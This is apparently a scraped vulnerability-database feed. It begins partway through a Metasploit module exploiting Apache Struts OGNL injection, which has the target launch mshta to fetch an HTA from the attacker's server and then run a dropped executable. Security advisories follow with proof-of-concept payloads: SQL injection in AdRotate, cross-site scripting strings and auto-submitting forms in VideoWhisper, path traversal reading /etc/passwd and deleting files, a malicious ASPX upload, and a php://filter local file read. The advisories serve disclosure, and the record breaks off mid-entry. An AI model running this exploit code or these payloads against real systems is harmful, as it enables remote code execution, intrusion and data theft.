\nfail_with(Exploit::Failure::Unknown, \"#{rhost}:#{rport} - OGNL injection failed\") \nend \n \nend \n \ndef exploit_windows \n@var_exename = rand_text_alpha(4 + rand(4)) + '.exe' \n@pl = build_hta \n@pl_sent = false \n \n# \n# start HTTP service if necessary \n# \nservice_url = start_http_service \n \n# \n# execute hta \n# \nuri = normalize_uri(target_uri.path) \nuri << \"?redirect:%25{(new+java.lang.ProcessBuilder(new+java.lang.String[]{'mshta',new%20java.lang.String('http:nn#{service_url}').replace('n','\\\\u002f')})).start()}\" \n \nprint_status(\"#{rhost}:#{rport} - Execute payload through malicious HTA...\") \n \nres = send_request_cgi({ \n'method' => 'GET', \n'uri' => uri \n}) \n \nif res.nil? or res.code != 302 \nfail_with(Exploit::Failure::Unknown, \"#{rhost}:#{rport} - OGNL injection failed\") \nend \n \n# \n# wait for payload download \n# \nwait_payload \n \nregister_file_for_cleanup(@var_exename) \nend \n \ndef exploit \nif target.name =~ /Automatic/ \nprint_status(\"#{rhost}:#{rport} - Target autodetection...\") \nmy_target = auto_target \nprint_good(\"#{rhost}:#{rport} - #{my_target.name} target found!\") \nelse \nmy_target = target \nend \n \np = exploit_regenerate_payload(my_target.platform, my_target.arch) \n@exe = generate_payload_exe({:code => p.encoded, :platform => my_target.platform, :arch => my_target.arch}) \n \nif my_target.name =~ /Linux/ \nif datastore['PAYLOAD'] =~ /windows/ \nfail_with(Exploit::Failure::BadConfig, \"#{rhost}:#{rport} - The target is Linux, but you've selected a Windows payload!\") \nend \nexploit_linux \nelsif my_target.name =~ /Windows/ \nif datastore['PAYLOAD'] =~ /linux/ \nfail_with(Exploit::Failure::BadConfig, \"#{rhost}:#{rport} - The target is Windows, but you've selected a Linux payload!\") \nend \nexploit_windows \nend \nend \n \n# Handle incoming requests from the server \ndef on_request_uri(cli, request) \nvprint_status(\"#{rhost}:#{rport} - URI requested: #{request.inspect}\") \nif (not @pl) \nprint_error(\"#{rhost}:#{rport} - A request came in, but the payload wasn't ready yet!\") \nreturn \nend \nprint_status(\"#{rhost}:#{rport} - Sending the payload to the server...\") \n@pl_sent = true \nsend_response(cli, @pl) \nend \n \n# wait for the data to be sent \ndef wait_payload \nprint_status(\"#{rhost}:#{rport} - Waiting for the victim to request the payload...\") \n \nwaited = 0 \nwhile (not @pl_sent) \nselect(nil, nil, nil, 1) \nwaited += 1 \nif (waited > datastore['HTTP_DELAY']) \nfail_with(Exploit::Failure::Unknown, \"#{rhost}:#{rport} - Target didn't request request the ELF payload -- Maybe it cant connect back to us?\") \nend \nend \nend \n \ndef build_hta \nvar_shellobj = rand_text_alpha(rand(5)+5); \nvar_fsobj = rand_text_alpha(rand(5)+5); \nvar_fsobj_file = rand_text_alpha(rand(5)+5); \nvar_vbsname = rand_text_alpha(rand(5)+5); \nvar_writedir = rand_text_alpha(rand(5)+5); \n \nvar_origLoc = rand_text_alpha(rand(5)+5); \nvar_byteArray = rand_text_alpha(rand(5)+5); \nvar_writestream = rand_text_alpha(rand(5)+5); \nvar_strmConv = rand_text_alpha(rand(5)+5); \n \n# Doing in this way to bypass the ADODB.Stream restrictions on JS, \n# even when executing it as an \"HTA\" application \n# The encoding code has been stolen from ie_unsafe_scripting.rb \nprint_status(\"#{rhost}:#{rport} - Encoding payload into vbs/javascript/hta...\"); \n \n# Build the content that will end up in the .vbs file \nvbs_content = Rex::Text.to_hex(%Q| \nDim #{var_origLoc}, s, #{var_byteArray} \n#{var_origLoc} = SetLocale(1033) \n|) \n# Drop the exe payload into an ansi string (ansi ensured via SetLocale above) \n# for conversion with ADODB.Stream \nvbs_ary = [] \n# The output of this loop needs to be as small as possible since it \n# gets repeated for every byte of the executable, ballooning it by a \n# factor of about 80k (the current size of the exe template). In its \n# current form, it's down to about 4MB on the wire \n@exe.each_byte do |b| \nvbs_ary << Rex::Text.to_hex(\"s=s&Chr(#{(\"%d\" % b)})\\n\") \nend \nvbs_content << vbs_ary.join(\"\") \n \n# Continue with the rest of the vbs file; \n# Use ADODB.Stream to convert from an ansi string to it's byteArray equivalent \n# Then use ADODB.Stream again to write the binary to file. \n#print_status(\"Finishing vbs...\"); \nvbs_content << Rex::Text.to_hex(%Q| \nDim #{var_strmConv}, #{var_writedir}, #{var_writestream} \n#{var_writedir} = WScript.CreateObject(\"WScript.Shell\").ExpandEnvironmentStrings(\"%TEMP%\") & \"\\\\#{@var_exename}\" \n \nSet #{var_strmConv} = CreateObject(\"ADODB.Stream\") \n \n#{var_strmConv}.Type = 2 \n#{var_strmConv}.Charset = \"x-ansi\" \n#{var_strmConv}.Open \n#{var_strmConv}.WriteText s, 0 \n#{var_strmConv}.Position = 0 \n#{var_strmConv}.Type = 1 \n#{var_strmConv}.SaveToFile #{var_writedir}, 2 \n \nSetLocale(#{var_origLoc})|) \n \nhta = <<-EOS \n<script> \nvar #{var_shellobj} = new ActiveXObject(\"WScript.Shell\"); \nvar #{var_fsobj} = new ActiveXObject(\"Scripting.FileSystemObject\"); \nvar #{var_writedir} = #{var_shellobj}.ExpandEnvironmentStrings(\"%TEMP%\"); \nvar #{var_fsobj_file} = #{var_fsobj}.OpenTextFile(#{var_writedir} + \"\\\\\\\\\" + \"#{var_vbsname}.vbs\",2,true); \n \n#{var_fsobj_file}.Write(unescape(\"#{vbs_content}\")); \n#{var_fsobj_file}.Close(); \n \n#{var_shellobj}.run(\"wscript.exe \" + #{var_writedir} + \"\\\\\\\\\" + \"#{var_vbsname}.vbs\", 1, true); \n#{var_shellobj}.run(#{var_writedir} + \"\\\\\\\\\" + \"#{@var_exename}\", 0, false); \n#{var_fsobj}.DeleteFile(#{var_writedir} + \"\\\\\\\\\" + \"#{var_vbsname}.vbs\"); \nwindow.close(); \n</script> \nEOS \n \nreturn hta \nend \n \n \nend \n`\n", "sourceHref": "https://packetstormsecurity.com/files/download/122541/struts_default_action_mapper.rb.txt", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2016-12-05T22:15:04", "bulletinFamily": "exploit", "description": "", "modified": "2014-02-21T00:00:00", "published": "2014-02-21T00:00:00", "id": "PACKETSTORM:125330", "href": "https://packetstormsecurity.com/files/125330/AdRotate-3.9.4-SQL-Injection.html", "title": "AdRotate 3.9.4 SQL Injection", "type": "packetstorm", "sourceData": "`Advisory ID: HTB23201 \nProduct: AdRotate \nVendor: AJdG Solutions \nVulnerable Version(s): 3.9.4 and probably prior \nTested Version: 3.9.4 \nAdvisory Publication: January 30, 2014 [without technical details] \nVendor Notification: January 30, 2014 \nVendor Patch: January 31, 2014 \nPublic Disclosure: February 20, 2014 \nVulnerability Type: SQL Injection [CWE-89] \nCVE Reference: CVE-2014-1854 \nRisk Level: High \nCVSSv2 Base Score: 7.5 (AV:N/AC:L/Au:N/C:P/I:P/A:P) \nSolution Status: Fixed by Vendor \nDiscovered and Provided: High-Tech Bridge Security Research Lab ( https://www.htbridge.com/advisory/ ) \n \n----------------------------------------------------------------------------------------------- \n \nAdvisory Details: \n \nHigh-Tech Bridge Security Research Lab discovered vulnerability in AdRotate, which can be exploited to perform SQL Injection attacks. \n \n \n1) SQL Injection in AdRotate: CVE-2014-1854 \n \nThe vulnerability exists due to insufficient validation of \"track\" HTTP GET parameter passed to \n\"/wp-content/plugins/adrotate/library/clicktracker.php\" script. A remote unauthenticated attacker can execute arbitrary SQL commands in application's database. \n \nThe following PoC code contains a base64-encoded string \"-1 UNION SELECT version(),1,1,1\", which will be injected into SQL query and will output MySQL server version: \n \nhttp://[host]/wp-content/plugins/adrotate/library/clicktracker.php?track=LTEgVU5JT04gU0VMRUNUIHZlcnNpb24oKSwxLDEsMQ== \n \nSuccessful exploitation will result in redirection to local URI that contains version of the MySQL server: \nhttp://[host]/wp-content/plugins/adrotate/library/5.1.71-community-log \n \n \n----------------------------------------------------------------------------------------------- \n \nSolution: \n \nUpdate to AdRotate 3.9.5 \n \nMore Information: \nhttp://www.adrotateplugin.com/2014/01/adrotate-pro-3-9-6-and-adrotate-free-3-9-5/ \nhttp://wordpress.org/plugins/adrotate/changelog/ \nhttp://www.adrotateplugin.com/development/ \n \n----------------------------------------------------------------------------------------------- \n \nReferences: \n \n[1] High-Tech Bridge Advisory HTB23201 - https://www.htbridge.com/advisory/HTB23201 - SQL Injection in AdRotate. \n[2] AdRotate - http://wordpress.org/plugins/adrotate/ - AdRotate for WordPress. \n[3] Common Vulnerabilities and Exposures (CVE) - http://cve.mitre.org/ - international in scope and free for public use, CVE\u00ae is a dictionary of publicly known information security vulnerabilities and exposures. \n[4] Common Weakness Enumeration (CWE) - http://cwe.mitre.org - targeted to developers and security practitioners, CWE is a formal list of software weakness types. \n[5] ImmuniWeb\u00ae - http://www.htbridge.com/immuniweb/ - is High-Tech Bridge's proprietary web application security assessment solution with SaaS delivery model that combines manual and automated vulnerability testing. \n \n----------------------------------------------------------------------------------------------- \n \nDisclaimer: The information provided in this Advisory is provided \"as is\" and without any warranty of any kind. Details of this Advisory may be updated in order to provide as accurate information as possible. The latest version of the Advisory is available on web page [1] in the References. \n`\n", "sourceHref": "https://packetstormsecurity.com/files/download/125330/adrotate-sql.txt", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2016-12-05T22:11:34", "bulletinFamily": "exploit", "description": "", "modified": "2014-04-25T00:00:00", "published": "2014-04-25T00:00:00", "href": "https://packetstormsecurity.com/files/126334/VideoWhisper-7-Cross-Site-Scripting.html", "id": "PACKETSTORM:126334", "type": "packetstorm", "title": "VideoWhisper 7 Cross Site Scripting", "sourceData": "`Vulnerability title: Cross-site scripting (XSS) vulnerability in Videowhisper \nCVE: CVE-2014-2715 \nVendor: VideoWhisper \nProduct: Videowhisper module for Drupal 7 \nAffected version: 7 \nFixed version: \nReported by: Mahmoud Ghorbanzadeh \n \nDetails: \n \nHello, \nI found Cross-site scripting (XSS) vulnerability in the Videowhisper module for Drupal 7 (videowhisper-7.x). The vulnerability exist at line 2 and line 4 in drupal\\modules\\videowhisper\\vwrooms\\templates\\logout.tpl.php due to $_GET['module'] and $_GET['message'] variables respectively at line 347 in drupal\\modules\\videowhisper\\vwrooms\\vwrooms.module. \n \nPOC: drupal/index.php?q=vwrooms/logout&module=<script>alert('XSS1')</script>&message=<script>alert('XSS2')</script> \n \nVendor Notification: 18, Apr 2014 \n \nDiscovered by Mahmoud Ghorbanzadeh, in Amirkabir University of Technology's Scientific Excellence and Research Centers. \n \nBest Regards. \n`\n", "sourceHref": "https://packetstormsecurity.com/files/download/126334/videowhisper7-xss.txt", "cvss": {"score": 4.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:NONE/I:PARTIAL/A:NONE/"}}], "securityvulns": [{"lastseen": "2018-08-31T11:10:52", "bulletinFamily": "software", "description": "\r\n\r\nAdvisory ID: HTB23199\r\nProduct: VideoWhisper Live Streaming Integration\r\nVendor: VideoWhisper\r\nVulnerable Version(s): 4.27.3 and probably prior\r\nTested Version: 4.27.3\r\nAdvisory Publication: February 6, 2014 [without technical details]\r\nVendor Notification: February 6, 2014 \r\nVendor Patch: February 7, 2014 \r\nPublic Disclosure: February 27, 2014 \r\nVulnerability Type: Unrestricted Upload of File with Dangerous Type [CWE-434], Cross-Site Scripting [CWE-79], Path Traversal [CWE-22], Information Exposure Through Externally-Generated Error Message [CWE-211]\r\nCVE References: CVE-2014-1905, CVE-2014-1906, CVE-2014-1907, CVE-2014-1908\r\nRisk Level: Critical \r\nCVSSv2 Base Scores: 9.3 (AV:N/AC:M/Au:N/C:C/I:C/A:C), 5 (AV:N/AC:L/Au:N/C:N/I:P/A:N), 5 (AV:N/AC:L/Au:N/C:P/I:N/A:N), 5 (AV:N/AC:L/Au:N/C:P/I:N/A:N)\r\nSolution Status: Fixed by Vendor\r\nDiscovered and Provided: High-Tech Bridge Security Research Lab ( https://www.htbridge.com/advisory/ ) \r\n\r\n-----------------------------------------------------------------------------------------------\r\n\r\nAdvisory Details:\r\n\r\nHigh-Tech Bridge Security Research Lab discovered multiple vulnerabilities in VideoWhisper Live Streaming Integration, which can be exploited to execute arbitrary code on the target system, gain access to potentially sensitive data, perform Cross-Site Scripting (XSS) attacks against users of vulnerable application and delete arbitrary files.\r\n\r\n\r\n1) Arbitrary File Upload in VideoWhisper Live Streaming Integration: CVE-2014-1905\r\n\r\nVideoWhisper Live Streaming Integration does not properly verify malicious file extensions before uploading files to the server in "/wp-content/plugins/videowhisper-live-streaming-integration/ls/vw_snapshots.php". A remote attacker can upload and execute arbitrary PHP file on the target system. \r\n\r\nThe following PoC code demonstrates exploitation of the vulnerability:\r\n\r\nAfter successful exploitation the remote shell will be accessible via the following URL:\r\n\r\nhttp://[host]/wp-content/plugins/videowhisper-live-streaming-integration/ls/snapshots/1.php.jpg\r\n\r\nSuccessful exploitation of this vulnerability requires that the webserver is not configured to handle the mime-type for media files with .jpg extension.\r\n\r\n\r\n2) Cross-Site Scripting (XSS) in VideoWhisper Live Streaming Integration: CVE-2014-1906\r\n\r\n2.1 The vulnerability exists due to insufficient filtration of "m" HTTP POST parameter in "/wp-content/plugins/videowhisper-live-streaming-integration/ls/lb_status.php" script. A remote attacker can send a specially crafted HTTP POST request to the vulnerable script and permanently inject and execute arbitrary html and script code in browser in context of the vulnerable website when user visits a page with enabled plugin\u2019s widget. The script will be also executed in administrative section on the following page: \r\n\r\nhttp://[host]/wp-admin/options-general.php?page=videowhisper_streaming.php&tab=live\r\n\r\nThe exploitation examples below use the "alert()" JavaScript function to display "immuniweb" word:\r\n\r\n<body onLoad="document.hack.submit()">\r\n<form name="hack" action="http://[host]/wp-content/plugins/videowhisper-live-streaming-integration/ls/lb_status.php" method="post">\r\n<input type="hidden" name="s" value="1">\r\n<input type="hidden" name="u" value="1">\r\n<input type="hidden" name="r" value="1">\r\n<input type="hidden" name="m" value="<script>alert('immuniweb')</script>">\r\n</form>\r\n</body>\r\n \r\n2.2 The vulnerability exists due to insufficient filtration of "msg" HTTP POST parameter in "/wp-content/plugins/videowhisper-live-streaming-integration/ls/vc_chatlog.php" script. A remote attacker can send a specially crafted HTTP POST request to the vulnerable script and permanently inject and execute arbitrary html and script code in browser in context of the vulnerable website when user visits the affected page. \r\n\r\nThe exploitation examples below use the "alert()" JavaScript function to display "immuniweb" word:\r\n\r\n<body onLoad="document.hack.submit()">\r\n<form name="hack" action="http://[host]/wp-content/plugins/videowhisper-live-streaming-integration/ls/vc_chatlog.php" method="post">\r\n<input type="hidden" name="msg" value="<script>alert('immuniweb')</script>">\r\n<input type="hidden" name="r" value="1">\r\n</form>\r\n</body>\r\n\r\nThe code will be executed when the user visits the following URL:\r\n\r\nhttp://[host]/wp-content/plugins/videowhisper-live-streaming-integration/ls/uploads/[room]/Log[date].html \r\n\r\nWhere [room] is set by HTTP POST parameter r and [date] is the current date.\r\n \r\n2.3 The vulnerabilities exist due to insufficient filtration of "n" HTTP GET parameter passed to scripts "channel.php", "htmlchat.php", "video.php" and "videotext.php" within the "/wp-content/plugins/videowhisper-live-streaming-integration/ls/" directory. A remote attacker can send a specially crafted HTTP GET request to vulnerable scripts and execute arbitrary HTML and script code in browser in context of the vulnerable website.\r\n\r\nThe exploitation examples below use the "alert()" JavaScript function to display "immuniweb" word:\r\n\r\nhttp://[host]/wp-content/plugins/videowhisper-live-streaming-integration/ls/channel.php?n=%3C/title%3E%3Cscript%3Ealert('immuniweb')%3C/script%3E\r\n\r\nhttp://[host]/wp-content/plugins/videowhisper-live-streaming-integration/ls/htmlchat.php?n=%3C/title%3E%3Cscript%3Ealert('immuniweb')%3C/script%3E\r\n\r\nhttp://[host]/wp-content/plugins/videowhisper-live-streaming-integration/ls/video.php?n=%3C/title%3E%3Cscript%3Ealert('immuniweb')%3C/script%3E\r\n\r\nhttp://[host]/wp-content/plugins/videowhisper-live-streaming-integration/ls/videotext.php?n=%3C/title%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E\r\n\r\n2.4 The vulnerability exists due to insufficient filtration of "message" HTTP GET parameter passed to "/wp-content/plugins/videowhisper-live-streaming-integration/ls/lb_logout.php" script. A remote attacker can trick a user to open a specially crafted link and execute arbitrary HTML and script code in browser in context of the vulnerable website.\r\n\r\nThe exploitation example below uses the "alert()" JavaScript function to display "immuniweb" word:\r\n\r\nhttp://[host]/wp-content/plugins/videowhisper-live-streaming-integration/ls/lb_logout.php?message=%3C/title%3E%3Cscript%3Ealert('immuniweb')%3C/script%3E\r\n\r\n2.5 The vulnerability exists due to insufficient filtration of "ct" HTTP POST parameter passed to "/wp-content/plugins/videowhisper-live-streaming-integration/ls/lb_status.php" script. A remote attacker can trick a logged-in user to open a specially crafted link and execute arbitrary HTML and script code in browser in context of the vulnerable website.\r\n\r\nThe exploitation example below uses the "alert()" JavaScript function to display "immuniweb" word:\r\n\r\n<body onLoad="document.hack.submit()">\r\n<form name="hack" action="http://[host]/wp-content/plugins/videowhisper-live-streaming-integration/ls/lb_status.php" method="post">\r\n<input type="hidden" name="s" value="1">\r\n<input type="hidden" name="r" value="1">\r\n<input type="hidden" name="ct" value="<script>alert('immuniweb')</script>">\r\n</form>\r\n</body>\r\n\r\n2.6 The vulnerability exists due to insufficient filtration of "ct" HTTP POST parameter passed to "/wp-content/plugins/videowhisper-live-streaming-integration/ls/v_status.php" script. A remote attacker can trick a user to open a specially crafted link and execute arbitrary HTML and script code in browser in context of the vulnerable website.\r\n\r\nThe exploitation example below uses the "alert()" JavaScript function to display "immuniweb" word:\r\n \r\n<body onLoad="document.hack.submit()">\r\n<form name="hack" action="http://[host]/wp-content/plugins/videowhisper-live-streaming-integration/ls/v_status.php" method="post">\r\n<input type="hidden" name="s" value="1">\r\n<input type="hidden" name="r" value="1">\r\n<input type="hidden" name="ct" value="<script>alert('immuniweb')</script>">\r\n</form>\r\n</body>\r\n\r\n\r\n3) Path Traversal in VideoWhisper Live Streaming Integration: CVE-2014-1907\r\n \r\n3.1 The vulnerability exists due to insufficient filtration of "s" HTTP GET parameter in "/wp-content/plugins/videowhisper-live-streaming-integration/ls/rtmp_login.php" script. A remote attacker can view contents of arbitrary files on the target system using directory traversal sequences.\r\n\r\nThe exploitation example below displays contents of "/etc/passwd" file:\r\n\r\nhttp://[host]/wp-content/plugins/videowhisper-live-streaming-integration/ls/rtmp_login.php?s=../../../../../../etc/passwd\r\n\r\n3.2 The vulnerability exists due to insufficient filtration of "s" HTTP GET parameter in "/wp-content/plugins/videowhisper-live-streaming-integration/ls/rtmp_logout.php" script. A remote attacker can delete arbitrary files on the target system using directory traversal sequences.\r\n\r\nThe exploitation example below deletes a file "/tmp/immuniweb":\r\n\r\nhttp://[host]/wp-content/plugins/videowhisper-live-streaming-integration/ls/rtmp_logout.php?s=../../../../../../../../tmp/immuniweb\r\n\r\nSuccessful exploitation of this vulnerability requires that file "/tmp/immuniweb" exists on the system.\r\n\r\n\r\n4) Information Exposure Through Externally-generated Error Message in VideoWhisper Live Streaming Integration: CVE-2014-1908\r\n\r\n4.1 The vulnerability exists due to improper implementation of error handling mechanisms in multiple scripts. A remote attacker can send a specially crafted HTTP GET request to vulnerable scripts and gain knowledge of full installation path of the application. \r\n\r\nThe following URL can be used to gain knowledge of full installation path of the application:\r\n\r\nhttp://[host]/wp-content/plugins/videowhisper-live-streaming-integration/bp.php\r\n\r\nhttp://[host]/wp-content/plugins/videowhisper-live-streaming-integration/videowhisper_streaming.php\r\n\r\nhttp://[host]/wp-content/plugins/videowhisper-live-streaming-integration/ls/rtmp.inc.php\r\n\r\n\r\n-----------------------------------------------------------------------------------------------\r\n\r\nSolution:\r\n\r\nUpdate to VideoWhisper Live Streaming Integration version 4.29.5\r\n\r\n-----------------------------------------------------------------------------------------------\r\n\r\nReferences:\r\n\r\n[1] High-Tech Bridge Advisory HTB23089 - https://www.htbridge.com/advisory/HTB23089 - Multiple Vulnerabilities in VideoWhisper Live Streaming Integration Plugin for WordPress.\r\n[2] VideoWhisper Live Streaming Integration - http://wordpress.org/plugins/videowhisper-live-streaming-integration/ - The VideoWhisper Live Streaming software can easily be used to add video broadcasting features to WordPress sites and live video streams on blog pages.\r\n[3] Common Vulnerabilities and Exposures (CVE) - http://cve.mitre.org/ - international in scope and free for public use, CVE\u00ae is a dictionary of publicly known information security vulnerabilities and exposures.\r\n[4] Common Weakness Enumeration (CWE) - http://cwe.mitre.org - targeted to developers and security practitioners, CWE is a formal list of software weakness types.\r\n[5] ImmuniWeb\u00ae - http://www.htbridge.com/immuniweb/ - is High-Tech Bridge's proprietary web application security assessment solution with SaaS delivery model that combines manual and automated vulnerability testing.\r\n\r\n-----------------------------------------------------------------------------------------------\r\n\r\nDisclaimer: The information provided in this Advisory is provided "as is" and without any warranty of any kind. Details of this Advisory may be updated in order to provide as accurate information as possible. The latest version of the Advisory is available on web page [1] in the References.\r\n\r\n", "modified": "2014-05-04T00:00:00", "published": "2014-05-04T00:00:00", "id": "SECURITYVULNS:DOC:30589", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:30589", "title": "Multiple Vulnerabilities in VideoWhisper Live Streaming Integration WP Plugin", "type": "securityvulns", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-08-31T11:10:52", "bulletinFamily": "software", "description": "\r\n\r\n-----BEGIN PGP SIGNED MESSAGE-----\r\nHash: SHA1\r\n\r\nCVE-2014-0111: Remote code execution by an authenticated administrator\r\n\r\nSeverity: Important\r\n\r\nVendor:\r\nThe Apache Software Foundation\r\n\r\nVersions Affected:\r\nSyncope 1.0.0 to 1.0.8\r\nSyncope 1.1.0 to 1.1.6\r\n\r\nDescription:\r\nIn the various places in which Apache Commons JEXL expressions are allowed (derived schema definition, user / role templates, account links of resource mappings) a malicious administrator can inject Java code that can be executed remotely by the JEE container running the Apache Syncope core.\r\n\r\nCredit:\r\nThis issue was discovered by Gregory Draperi.\r\n\r\nReferences:\r\nhttp://syncope.apache.org/security.html\r\n\r\n-----BEGIN PGP SIGNATURE-----\r\nVersion: GnuPG v1.4.14 (GNU/Linux)\r\nComment: Using GnuPG with Thunderbird - http://www.enigmail.net/\r\n\r\niQEcBAEBAgAGBQJTTOJyAAoJEGtDE+0nPfKHxWcIAI9POTzr4bIF7fXO25uXgfny\r\nBO8SR0fmGScdmeohf8nQZbUNgKA1F7YRe5vC9r8nKFSpdDJrMnPSTOwMYrgdOxHt\r\nRl/SpEab4b8NX0FO1a6TObDbXBDj+Q+4cNUXOOc0jC7lU67n1SorfGaMbjLfcZ0w\r\n2xnZsbAQ0P0bmIJ2mR+LuXLsEA3kwvClF9fUTEDlJ4Rm/yT16UGvD5+vEJdMQzen\r\nJhBdT8VeX4wvtYr9+WmmWqeWgvSmezE07s5Pu36qXkxAEFGzdQBtJ/XJbpbgM7Sa\r\n7MoZQHQqJ5VwUVGMseqcxhAjD065uHP41HpAeF4TFQvp4jg8/FiybFdXqiJ+smI=\r\n=4XQi\r\n-----END PGP SIGNATURE-----\r\n\r\n", "modified": "2014-05-04T00:00:00", "published": "2014-05-04T00:00:00", "id": "SECURITYVULNS:DOC:30593", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:30593", "title": "[SECURITY] CVE-2014-0111 Apache Syncope", "type": "securityvulns", "cvss": {"score": 6.5, "vector": "AV:NETWORK/AC:LOW/Au:SINGLE_INSTANCE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2018-08-31T11:10:51", "bulletinFamily": "software", "description": "\r\n\r\nCVE-2013-2251: Apache Archiva Remote Command Execution\r\n\r\nSeverity: Important\r\n\r\nVendor: The Apache Software Foundation\r\n\r\nVersions Affected:\r\n- Archiva 1.3 to Continuum 1.3.6\r\n- The unsupported versions Archiva 1.2 to 1.2.2 are also affected.\r\n\r\nDescription:\r\nApache Archiva is affected by a vulnerability in the version of the Struts library being used, which allows a malicious user to run code on the server remotely. More details about the vulnerability can be found at http://struts.apache.org/2.3.x/docs/s2-016.html.\r\n\r\nMitigation:\r\nAll users are recommended to upgrade to Archiva 2.0.1 or Archiva 1.3.8, which are not affected by this issue.\r\n\r\nArchiva 2.0.0 and later is not affected by this issue.\r\n\r\nReferences:\r\nhttp://archiva.apache.org/security.html\r\n\r\n\r\n\r\n", "modified": "2014-05-04T00:00:00", "published": "2014-05-04T00:00:00", "id": "SECURITYVULNS:DOC:30568", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:30568", "title": "[SECURITY] CVE-2013-2251: Apache Archiva Remote Command Execution", "type": "securityvulns", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-08-31T11:10:51", "bulletinFamily": "software", "description": "\r\n\r\nVulnerability title: Unrestricted file upload in Livetecs Timelive\r\nCVE: CVE-2014-2042\r\nVendor: Livetecs\r\nProduct: Timelive\r\nAffected version: 6.2.71\r\nFixed version: 6.5.1\r\nReported by: Richard Hatch\r\n\r\nDetails:\r\nIt was discovered that it was possible for low-level TimeLive\r\napplication users to upload\r\nfiles (by using the "My Projects".."Manage Project" functionality).\r\nThere was no restriction on\r\nfile types that could be uploaded and the permissions applied to those\r\nuploaded files included\r\n"Read and Execute".\r\n\r\n1. Using any text editor create a new file "run-cacl.aspx" and add the\r\nfollowing content:\r\n\r\n<%@ Page Language="VB" %>\r\n <%\r\n System.Diagnostics.Process.Start("calc.exe")\r\n %>\r\n\r\n2. Login to the TimeLive application as a low-level (standard) user\r\n3. Click "My Projects" from the left-hand menu\r\n4. Click the "Manage" icon - It looks like a notepad and pen\r\n5. Scroll to the bottom of the page that opens and click "Attachment"\r\n6. Click "Browse" and navigate to to where you saved "run-cacl.exe"\r\n7. Click "Upload"\r\n8. Logout of TimeLive [Optional]\r\n9. On the server hosting the TimeLive application run "TaskMgr"\r\n9. Browse to http://MyTimeLiveURL/Uploads/1/1/run-cacl.aspx\r\n10. Observe "calc.exe" running as "NETWORK_SERVICE" in the Task manager\r\nNote: Depending on the configuration of the TimeLive application used\r\nfor testing it may be\r\nnecessary to change the "1/1" part of the URL.\r\n \r\n\r\nFurther details at:\r\nhttps://www.portcullis-security.com/security-research-and-downloads/security-advisories/cve-2014-2042/\r\n\r\n\r\nCopyright:\r\nCopyright (c) Portcullis Computer Security Limited 2014, All rights\r\nreserved worldwide. Permission is hereby granted for the electronic\r\nredistribution of this information. It is not to be edited or altered in\r\nany way without the express written consent of Portcullis Computer\r\nSecurity Limited.\r\n\r\nDisclaimer:\r\nThe information herein contained may change without notice. Use of this\r\ninformation constitutes acceptance for use in an AS IS condition. There\r\nare NO warranties, implied or otherwise, with regard to this information\r\nor its use. Any use of this information is at the user's risk. In no\r\nevent shall the author/distributor (Portcullis Computer Security\r\nLimited) be held liable for any damages whatsoever arising out of or in\r\nconnection with the use or spread of this information.\r\n\r\n", "modified": "2014-05-04T00:00:00", "published": "2014-05-04T00:00:00", "id": "SECURITYVULNS:DOC:30561", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:30561", "title": "CVE-2014-2042 - Unrestricted file upload in Livetecs Timelive", "type": "securityvulns", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2018-08-31T11:10:51", "bulletinFamily": "software", "description": "\r\n\r\nCVE-2013-2187: Apache Archiva Cross-Site Scripting vulnerability\r\n\r\nSeverity: Important\r\n\r\nVendor: The Apache Software Foundation\r\n\r\nVersions Affected:\r\n- Archiva 1.3 to Continuum 1.3.6\r\n- The unsupported versions Archiva 1.2 to 1.2.2 are also affected.\r\n\r\nDescription:\r\nA request that included a specially crafted request parameter could be used to inject arbitrary HTML or Javascript into the Archiva home page.\r\n\r\nMitigation:\r\nAll users are recommended to upgrade to Archiva 2.0.1 or Archiva 1.3.8, which are not affected by this issue.\r\n\r\nArchiva 2.0.0 and later is not affected by this issue.\r\n\r\nReferences:\r\nhttp://archiva.apache.org/security.html\r\n\r\n\r\n\r\n", "modified": "2014-05-04T00:00:00", "published": "2014-05-04T00:00:00", "id": "SECURITYVULNS:DOC:30567", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:30567", "title": "[SECURITY] CVE-2013-2187: Apache Archiva Cross-Site Scripting vulnerability", "type": "securityvulns", "cvss": {"score": 4.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:NONE/I:PARTIAL/A:NONE/"}}, {"lastseen": "2018-08-31T11:10:51", "bulletinFamily": "software", "description": "\r\n\r\nVulnerability title: Arbitrary file read in dompdf\r\nCVE: CVE-2014-2383\r\nVendor: dompdf\r\nProduct: dompdf\r\nAffected version: v0.6.0\r\nFixed version: v0.6.1 (partial fix)\r\nReported by: Alejo Murillo Moyas\r\n\r\nDetails:\r\nAn arbitrary file read vulnerability is present on dompdf.php file that\r\nallows remote or local attackers to read local files using a special\r\ncrafted argument. This vulnerability requires the configuration flag\r\nDOMPDF_ENABLE_PHP to be enabled (which is disabled by default).\r\n\r\nUsing PHP protocol and wrappers it is possible to bypass the dompdf's\r\n"chroot" protection (DOMPDF_CHROOT) which prevents dompdf from accessing\r\nsystem files or other files on the webserver. Please note that the flag\r\nDOMPDF_ENABLE_REMOTE needs to be enabled.\r\n\r\nCommand line interface:\r\nphp dompdf.php\r\nphp://filter/read=convert.base64-encode/resource=<PATH_TO_THE_FILE>\r\n\r\nWeb interface:\r\n 